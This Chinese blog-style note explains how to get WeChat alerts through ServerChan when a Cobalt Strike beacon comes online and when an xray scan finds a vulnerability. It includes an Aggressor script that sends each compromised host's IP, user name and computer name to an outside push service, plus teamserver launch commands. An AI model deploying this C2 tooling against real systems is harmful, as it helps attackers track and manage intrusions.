本文仅作学习记录,如有侵权,请联系删除!
前言:
ServerChan是一款 程序员 和 服务器 之间的通信软件,也就是从服务器推送报警和日志信息到手机的工具。我们可以利用ServerChan实现CobaltStrike上线微信提醒。
url地址:http://sc.ftqq.com/3.version
Server酱实现CS上线微信通知:
1、用Github账号登录后,点击发送消息,获取SCKEY:
2、用微信绑定ServerChan
3、复制下面代码保存为 http_ftqq.cna 文件,CS加载插件:
# 循环获取所有beacon
on beacon_initial {
sub http_get {
local('$output');
$url = [new java.net.URL: $1];
$stream = [$url openStream];
$handle = [SleepUtils getIOHandle: $stream, $null];
@content = readAll($handle);
foreach $line (@content) {
$output .= $line . "\r\n";
}
println($output);
}
#获取ip、计算机名、登录账号
$internalIP = replace(beacon_info($1, "internal"), " ", "_");
$userName = replace(beacon_info($1, "user"), " ", "_");
$computerName = replace(beacon_info($1, "computer"), " ", "_");
#get一下Server酱的链接
$url = 'https://sc.ftqq.com/{SECKEY}.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0Aip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;
http_get($url);
}
实现效果图:
服务端加载插件:
把cna脚本添加到本地客户端后,如果beacon上线了,这个提醒的请求是从客户端发出的。
那么问题来了,如果我要接收通知,是不是就得一直开着客户端连着teamserver?
这样就非常不方便了,而且如果网络有波动,断开了到teamserver的连接,就收不到通知了。
CobaltStrike有两种加载插件的方法,一种是在客户端加载,一种是在服务端加载。在客户端加载,当客户端没连接上服务端后,该插件即不会被加载。所以有时候需要在服务端加载某些插件。
在服务器端有个 agscript 文件,他就是用来在服务器端运行cna文件的,这样就不用一直连着服务器端
./agscript [host] [port] [user] [pass] </path/to/file.cna>
[host] #cs服务器的ip地址
[port] #cs的端口号
[user] #用户名,用来运行这个脚本的用户名,随便即可。
[pass] #cs的密码,就是启动cs时你设置的密码。
[path] #cna文件的路径。
但是我们一般会将其运行在后台:
nohup ./agscript 192.168.107.129 50050 book4yi sws888 /root/桌面/cs3.14-extends/server_wechat_info/http_ftqq.cna &
注意:Server酱 同样内容的消息一分钟只能发送一次
补充:
Cobalt Strike beacon上线通知tg:
具体详情参考:Cobalt Strike beacon上线通知cna脚本
Server酱联合xray实现漏洞自动告警:
xray 有一种漏洞输出模式叫 webhook-output,在发现漏洞的时候,会向指定的 url post 输出漏洞数据
代码如下:
import requests
requests.post(webhook, json=vuln_info)
对于 xray来说,webhook 应该是一个 url 地址,也就是需要我们自己搭建一个 web 服务器,接收到 xray 发送的漏洞信息,然后将它转发出来,因为推送不适合发送太大的数据量,所以就选择了基础的一些字段,借助于 Python 的 flask 框架,代码如下:
from flask import Flask, request
import requests
import datetime
import logging
app = Flask(__name__)
def push_ftqq(content):
resp = requests.post("https://sc.ftqq.com/{SECKEY}.send",
data={"text": "xray vuln alarm", "desp": content})
if resp.json()["errno"] != 0:
raise ValueError("push ftqq failed, %s" % resp.text)
@app.route('/webhook', methods=['POST'])
def xray_webhook():
vuln = request.json
content = """## xray 发现了新漏洞
url: {url}
插件: {plugin}
漏洞类型: {vuln_class}
发现时间: {create_time}
请及时查看和处理
""".format(url=vuln["target"]["url"], plugin=vuln["plugin"],
vuln_class=vuln["vuln_class"] or "Default",
create_time=str(datetime.datetime.fromtimestamp(vuln["create_time"] / 1000)))
try:
push_ftqq(content)
except Exception as e:
logging.exception(e)
return 'ok'
if __name__ == '__main__':
app.run()
xray运行进行测试:
xray_windows_amd64.exe webscan --url "http://192.168.107.137/pikachu/vul/xss/xss_reflected_get.php?message=1&submit=submit" --plugins xss --webhook-output http://127.0.0.1:5000/webhook
微信成功收到漏洞消息,效果展示:
半年前就知道有Server酱可以微信上线通知了,最近才把玩了一番,真有意思~
参考如下:
利用ServerChan实现CobaltStrike上线微信提醒
Cobalt Strike 上线微信提醒
CobaltStrike加载插件
xray如何对接微信,实现漏洞自动告警?
网友评论